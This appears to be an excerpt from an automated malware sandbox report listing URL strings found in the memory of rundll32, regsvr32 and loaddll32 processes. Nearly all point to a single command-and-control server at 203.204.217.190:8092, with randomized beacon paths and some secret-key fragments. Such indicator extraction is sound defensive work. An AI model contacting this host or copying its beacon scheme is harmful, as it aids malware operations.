            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 09:22:43 GMTContent-Length: 0
            Source: rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2661833618.000000000CE28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092
            Source: rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/
            Source: regsvr32.exe, 00000004.00000002.4209945473.0000000000B1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/4
            Source: rundll32.exe, 00000007.00000002.4210351157.000000000059A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/C9
            Source: loaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.html
            Source: loaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.html?
            Source: loaddll32.exe, 00000001.00000002.4212338833.000000000A022000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.html?bs=3q3556174&n=5l3348
            Source: loaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.php
            Source: loaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.phphttp://203.204.217.190:
            Source: rundll32.exe, 00000006.00000002.4212929021.000000000CC16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/api.html
            Source: rundll32.exe, 00000006.00000002.4212929021.000000000CC16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/api.html2006-01-02T15:04:05.999999999Z07:00
            Source: rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/api.html?x=19440630&xj=33556174
            Source: rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/api.php
            Source: rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/api.php.
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC18000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.html
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC18000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.html?
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC18000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.html?H
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.html?rp=33556174&w=6871591h9
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.html?rp=33556174&w=6871591h9Mozilla/5.0
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC18000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.php
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC18000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.phphttp://203.204.217.190:8092/db/namespaces/signin
            Source: rundll32.exe, 00000008.00000003.2661683184.000000000CE46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.html
            Source: rundll32.exe, 00000008.00000003.2661683184.000000000CE46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.html?
            Source: rundll32.exe, 00000008.00000003.3673360000.000000000D094000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.html?h=75352k715&wh=18f84w5
            Source: rundll32.exe, 00000008.00000003.2661683184.000000000CE46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.php
            Source: rundll32.exe, 00000008.00000003.2661683184.000000000CE46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.phphttp://203.204.217.190:8
            Source: rundll32.exe, 00000007.00000003.3671385890.000000000C9F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/http://203.204.217.190:8092
            Source: rundll32.exe, 00000006.00000002.4210958697.000000000099A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/l
            Source: regsvr32.exe, 00000004.00000003.3996852512.000000000CD70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.html
            Source: regsvr32.exe, 00000004.00000003.3996852512.000000000CD70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.html?
            Source: regsvr32.exe, 00000004.00000003.3996435378.000000000CDFA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.html?c=68572884&oo=67
            Source: regsvr32.exe, 00000004.00000003.3996852512.000000000CD70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.php
            Source: regsvr32.exe, 00000004.00000003.3996852512.000000000CD70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.phphttp://203.204.217
            Source: rundll32.exe, 00000007.00000003.3671523760.000000000C9DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/oauth/sign-up.html
            Source: rundll32.exe, 00000007.00000003.3671523760.000000000C9DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/oauth/sign-up.html?
            Source: rundll32.exe, 00000007.00000003.3672973285.000000000C902000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/oauth/sign-up.html?dr=18845628&k=7303s814h1
            Source: rundll32.exe, 00000007.00000003.3672973285.000000000C902000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/oauth/sign-up.html?dr=18845628&k=7303s814h1Mozilla/5.0
            Source: rundll32.exe, 00000007.00000003.3671523760.000000000C9DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/oauth/sign-up.php
            Source: rundll32.exe, 00000007.00000003.3671523760.000000000C9DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/oauth/sign-up.phphttp://203.204.217.190:8092/namespaces/oauth
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/api/php/db/sign-up.html
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/api/php/db/sign-up.html?
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/api/php/db/sign-up.html?H
            Source: rundll32.exe, 00000007.00000003.3672973285.000000000C902000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/api/php/db/sign-up.html?_u=3355617q4&u=4866k2066
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/api/php/db/sign-up.php
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/api/php/db/sign-up.phphttp://203.204.217.190:8092/oauth/api/php/db
            Source: rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/database/namespaces/database/api/db/database/register.html
            Source: rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/database/namespaces/database/api/db/database/register.html?
            Source: rundll32.exe, 00000005.00000003.3835054805.000000000CD5E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/database/namespaces/database/api/db/database/register.html?c=21322
            Source: rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.html
            Source: rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.html?
            Source: rundll32.exe, 00000005.00000003.3835054805.000000000CD5E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.html?j=667332t1t6&y
            Source: rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.php
            Source: rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.phphttp://203.204.2
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A1A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth2/database/api/php/samples.html
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A1A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth2/database/api/php/samples.html.
            Source: loaddll32.exe, 00000001.00000002.4212338833.000000000A006000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth2/database/api/php/samples.html?d=71155844&og=18845628
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A1A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth2/database/api/php/samples.htmlHU
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A1A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth2/database/api/php/samples.php
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A1A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth2/database/api/php/samples.phphttp://203.204.217.190:8092/oauth2/da
            Source: regsvr32.exe, 00000004.00000003.3996528506.000000000CDF2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth2/oauth/db/api.html
            Source: regsvr32.exe, 00000004.00000003.3996528506.000000000CDF2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth2/oauth/db/api.html?
            Source: regsvr32.exe, 00000004.00000002.4216608137.000000000CD04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth2/oauth/db/api.html?_=36462oo14&ip=33556174
            Source: regsvr32.exe, 00000004.00000002.4216608137.000000000CD04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth2/oauth/db/api.html?_=36462oo14&ip=33556174Mozilla/5.0
            Source: regsvr32.exe, 00000004.00000003.3996528506.000000000CDF2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth2/oauth/db/api.php
            Source: regsvr32.exe, 00000004.00000003.3996528506.000000000CDF2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth2/oauth/db/api.phpC:
            Source: rundll32.exe, 00000006.00000003.2589833273.000000000CD1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/rpc.html
            Source: rundll32.exe, 00000006.00000003.2589897810.000000000CCFE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/rpc.html?o=7v7059308&sc=67086726
            Source: rundll32.exe, 00000006.00000003.2589833273.000000000CD1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/rpc.htmlSetFileCompletionNotificationModesC:
            Source: rundll32.exe, 00000006.00000003.2589897810.000000000CCFE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/rpc.php
            Source: rundll32.exe, 00000006.00000003.2589897810.000000000CCFE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/rpc.php.
            Source: rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/ssh-ed25519-cert-v01
            Source: loaddll32.exe, 00000001.00000003.3286610660.000000000A07A000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.4215361930.000000000A07A000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.4218098729.000000000CD54000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4224807817.000000000CE86000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4214808976.000000000CCA0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2540697370.000000000D00C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4219213679.000000000C93C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4212133165.000000000C802000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4216262550.000000000CC6E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:80920
            Source: rundll32.exe, 00000006.00000002.4214808976.000000000CCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:80925519
            Source: rundll32.exe, 00000008.00000003.3673317599.0000000000672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092Cg9
            Source: rundll32.exe, 00000006.00000002.4214808976.000000000CCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092DDFAD6ZDV4SX6SD3YZPDRKLNNJ3DFPDPWinHttpGetDefaultProxyConfiguratmime:
            Source: rundll32.exe, 00000006.00000003.2589492198.000000000CD62000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3671385890.000000000C9F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092Upgrade-Insecure-Requests
            Source: loaddll32.exe, 00000001.00000002.4214235667.000000000A05A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092Upgrade-Insecure-Requests5
            Source: regsvr32.exe, 00000004.00000002.4222371334.000000000CE6A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092Upgrade-Insecure-Requests_=36462oo14&ip=33556174same
            Source: loaddll32.exe, 00000001.00000002.4225609264.000000000A494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092Upgrade-Insecure-Requestsbs=3q3556174&n=5l3348718same
            Source: rundll32.exe, 00000005.00000002.4221007051.000000000CD66000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092Upgrade-Insecure-Requestsc=21322866&wd=a33556174
            Source: rundll32.exe, 00000007.00000003.3671523760.000000000C9CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092Upgrade-Insecure-Requestsdr=18845628&k=7303s814h1same
            Source: rundll32.exe, 00000008.00000003.2661833618.000000000CE28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092Upgrade-Insecure-Requestsh=75352k715&wh=18f84w5628
            Source: rundll32.exe, 00000005.00000002.4221007051.000000000CD66000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092Upgrade-Insecure-Requestsj=667332t1t6&yi=670f86726time:
            Source: rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092Upgrade-Insecure-Requestsrp=33556174&w=6871591h9same
            Source: rundll32.exe, 00000006.00000002.4214808976.000000000CCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092Upgrade-Insecure-Requestsx=19440630&xj=33556174CM_Get_Device_Interface_Li
            Source: loaddll32.exe, 00000001.00000002.4214235667.000000000A05A000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.4221656723.000000000CE04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092WinHttpGetDefaultProxyConfigurat
            Source: rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092WinHttpGetDefaultProxyConfigurathttps://203.204.217.190:8092
            Source: rundll32.exe, 00000008.00000002.4210687213.0000000000674000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3973364795.0000000000672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092cg
            Source: rundll32.exe, 00000008.00000003.2661833618.000000000CE28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092http://203.204.217.190:8092WinHttpGetDefaultProxyConfigurati
            Source: rundll32.exe, 00000006.00000002.4211389999.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3917332777.00000000009CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092kG
            Source: rundll32.exe, 00000008.00000002.4210687213.0000000000674000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3973364795.0000000000672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092sg
            Source: rundll32.exe, 00000005.00000002.4211265707.0000000000811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://203.2:H
            Source: rundll32.exe, 00000006.00000002.4217009815.000000000CD0A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://CertCloseStoredb/api.php
            Source: rundll32.exe, 00000006.00000002.4217009815.000000000CD0A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://CreateHardLinkWCreatePipeCreateProcessWx=19440630&xj=HTTP/1.1tDeleteFileWUser-Agex=User-Agent
            Source: rundll32.exe, 00000006.00000003.2540660313.000000000D024000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://HTTP/1.1CARAMELIZEVICTIMOLOGIESGENTAMICINtUser-AgeUser-AgentIMPEACHERSSCAGLIOLASSKIMOBILEDPRE
            Source: regsvr32.exe, 00000004.00000003.3996365517.000000000CE34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://HTTP/1.1tUser-AgePOSTPOSITIONPRESANCTIFIEDAPRIORITYSITARISTSAUTOROUTEUser-AgentUser-AgentGAIL
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A1AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://HTTP/1.1tUser-AgeUser-AgentUser-Agentd=
            Source: rundll32.exe, 00000007.00000003.3671401156.000000000C9F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://HTTP/1.1tUser-AgeUser-AgentUser-Agentdr=
            Source: rundll32.exe, 00000008.00000002.4220443970.000000000CD0E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://HTTP/1.1tUser-AgeUser-AgentUser-Agentrp=
            Source: loaddll32.exe, 00000001.00000002.4225609264.000000000A484000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://bs=3q3556174&n=HTTP/1.1tUser-Agebs=User-AgentUser-Agentbs=3q3556174&n=Connection
            Source: rundll32.exe, 00000005.00000002.4219138978.000000000CD30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c=21322866&wd=HTTP/1.1tUser-Agec=User-AgentUser-Agentc=21322866&wd=Connection
            Source: regsvr32.exe, 00000004.00000003.3996365517.000000000CE34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c=68572884&oo=HTTP/1.1tUser-Agec=User-Agent
            Source: rundll32.exe, 00000008.00000003.3674217974.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2661881087.000000000CE0C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://h=75352k715&wh=HTTP/1.1tUser-Ageh=User-AgentUser-Agenth=75352k715&wh=Connection
            Source: rundll32.exe, 00000005.00000002.4219138978.000000000CD30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://j=667332t1t6&yi=HTTP/1.1tUser-Agej=User-AgentUser-Agentj=667332t1t6&yi=Connection
            Source: rundll32.exe, 00000008.00000003.2661833618.000000000CE28000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4221030380.000000000CD22000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC1A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3692594105.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/
            Source: rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/%0-
            Source: rundll32.exe, 00000005.00000002.4211265707.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/D
            Source: loaddll32.exe, 00000001.00000002.4226594192.000000000A4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/namespaces/login.html
            Source: loaddll32.exe, 00000001.00000002.4226594192.000000000A4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/namespaces/login.html?
            Source: loaddll32.exe, 00000001.00000002.4226594192.000000000A4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/namespaces/login.html?WinHttpGetDefaultProxyConfiguration
            Source: loaddll32.exe, 00000001.00000002.4215361930.000000000A082000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/namespaces/login.html?r=3772_4761&so=584673b09
            Source: loaddll32.exe, 00000001.00000002.4215361930.000000000A082000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/namespaces/login.html?r=3772_4761&so=584673b09Mozilla/5.0
            Source: loaddll32.exe, 00000001.00000002.4226594192.000000000A4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/namespaces/login.php
            Source: loaddll32.exe, 00000001.00000002.4226594192.000000000A4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/namespaces/login.phphttps://203.204.217.190:8092/api/namespaces/log
            Source: regsvr32.exe, 00000004.00000003.3995842237.000000000CEBA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/oauth/database/oauth/samples.html
            Source: regsvr32.exe, 00000004.00000003.3997562902.000000000CD26000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.3995842237.000000000CEBA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/oauth/database/oauth/samples.html?
            Source: regsvr32.exe, 00000004.00000003.3997562902.000000000CD26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/oauth/database/oauth/samples.html?AGE-SECRET-KEY-1M74AHG87SZUEJ8TGQ
            Source: regsvr32.exe, 00000004.00000003.3997518277.000000000CD34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/oauth/database/oauth/samples.html?e=97374091&sa=63y379847
            Source: regsvr32.exe, 00000004.00000003.3995842237.000000000CEBA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/oauth/database/oauth/samples.php
            Source: regsvr32.exe, 00000004.00000003.3995842237.000000000CEBA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/oauth/database/oauth/samples.phphttps://203.204.217.190:8092/api/oa
            Source: rundll32.exe, 00000005.00000002.4224807817.000000000CE86000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/oauth2callback/api/oauth2callback/database/database/php/api.html
            Source: rundll32.exe, 00000005.00000002.4224807817.000000000CE86000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/oauth2callback/api/oauth2callback/database/database/php/api.html?
            Source: rundll32.exe, 00000005.00000003.3835249058.000000000CD3E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/oauth2callback/api/oauth2callback/database/database/php/api.html?_=
            Source: rundll32.exe, 00000005.00000002.4216612761.000000000CC98000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/oauth2callback/api/oauth2callback/database/database/php/api.html?ht
            Source: rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/api/oauth2callback/api/oauth2callback/database/database/php/api.phphttp
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/database/database/db/database/login.html
            Source: rundll32.exe, 00000008.00000002.4216262550.000000000CCA6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4214213422.000000000CC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/database/database/db/database/login.html?
            Source: rundll32.exe, 00000008.00000002.4216262550.000000000CCA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/database/database/db/database/login.html?AGE-SECRET-KEY-1M74AHG87SZUEJ8
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC22000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4216262550.000000000CC6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/database/database/db/database/login.html?n=56_849732&pi=58467309
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/database/database/db/database/login.php
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/database/database/db/database/login.phphttps://203.204.217.190:8092/dat
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C8B2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/database/php/php/database/register.html
            Source: rundll32.exe, 00000007.00000003.3672973285.000000000C90E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4214531173.000000000C8B2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/database/php/php/database/register.html?
            Source: rundll32.exe, 00000007.00000003.3672973285.000000000C90E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/database/php/php/database/register.html?AGE-SECRET-KEY-1M74AHG87SZUEJ8T
